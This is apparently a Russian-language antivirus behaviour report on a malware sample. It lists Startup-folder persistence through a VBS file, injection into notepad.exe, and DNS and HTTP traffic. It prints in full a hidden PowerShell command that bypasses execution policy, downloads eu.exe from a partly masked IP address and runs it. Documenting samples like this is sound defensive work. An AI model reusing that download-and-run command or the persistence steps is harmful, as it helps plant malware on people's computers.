Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\stat.vbs
Вредоносные функции
Загружает и запускает на исполнение
- http://46.##3.221.147/eu.exe как %appdata%\eu.exe
Внедряет код в
следующие системные процессы:
- %WINDIR%\syswow64\notepad.exe
следующие пользовательские процессы:
- eu.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abctfhghghghghВЈ.sct
- %APPDATA%\eu.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://46.##3.221.147/eu.exe
UDP
- DNS ASK BN####.PUBLICVM.COM
Другое
Создает и запускает на исполнение
- '%APPDATA%\eu.exe'
- '%APPDATA%\eu.exe' 2 1008 1107203
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://46.##3.221.147/eu.exe','%APPDATA%\eu.exe');Start-Process '%APPDATA%\eu...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\notepad.exe'
